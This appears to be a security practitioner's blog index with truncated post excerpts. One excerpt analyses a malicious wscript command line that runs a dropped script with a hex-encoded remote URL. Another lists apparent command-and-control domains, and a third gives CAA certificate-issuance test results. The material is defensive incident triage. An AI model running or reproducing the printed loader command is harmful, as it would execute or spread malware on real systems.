About:me

I’m a dedicated father and friend. I enjoy technology immensely and feel extremely lucky to have been born at the right place & during the right time. I started out working for the University of Dayton as a co-op student in computer science. I fell in love with the concept of networking – this was

Examining strange wscript behavior

We use Cylance with script control, and periodically I review the outliers that have been blocked. I came across this one recently:

wscript.exe “C:\ProgramData\{18E0DD83-92A2-5745-1464-C9078E2642C9}\domo.txt” “68747470733a2f2f643237346571343163333972326e2e636c6f756466726f6e742e6e6574” “//B” “//E:jscript” “–IsErIk”

I took a copy of the domo.txt script and uploaded it to VT. I also ran that hex string through a hex decoder: 68747470733a2f2f643237346571343163333972326e2e636c6f756466726f6e742e6e = According to


Unfortunately, as of 16 April 2019, I’m still seeing traffic on this domain. Here are some others I’m seeing:

dfbfb63dcaff96fbe9616fb806e4799f.com
8d46980d994cc618aeed127df1b5c86d8acd86ce.info
07bf396c25d9a624281c97752aee0247e4229b84.xyz
07bf396c25d9a624281c97752aee0247e4229b84.com
07bf396c25d9a624281c97752aee0247e4229b84.info
d234304f57772cf6be78ab6c24a65c91ce896fff.xyz
d2343

I’m now the proud owner of these domains: Why would I purchase such strange looking domains, you ask? It all started long ago, while working for my enterprise. I saw some activity flagged by OpenDNS / Umbrella for some CnC traffic bound for these domains. It was being blocked, but as I

CAA Test Results

As promised, I’ve been testing Certification Authority Authorization (CAA) with some Certificate Authorities, and here’s what I found so far:

Amazon Certificate Manager (ACM)
It does not appear they honor the IODEF, since I didn’t receive an email.

Let’s Encrypt appears to also block issuance:

Let’s Encrypt (using lego)
2018/12/29 16:44:30 Could not obtain certificates


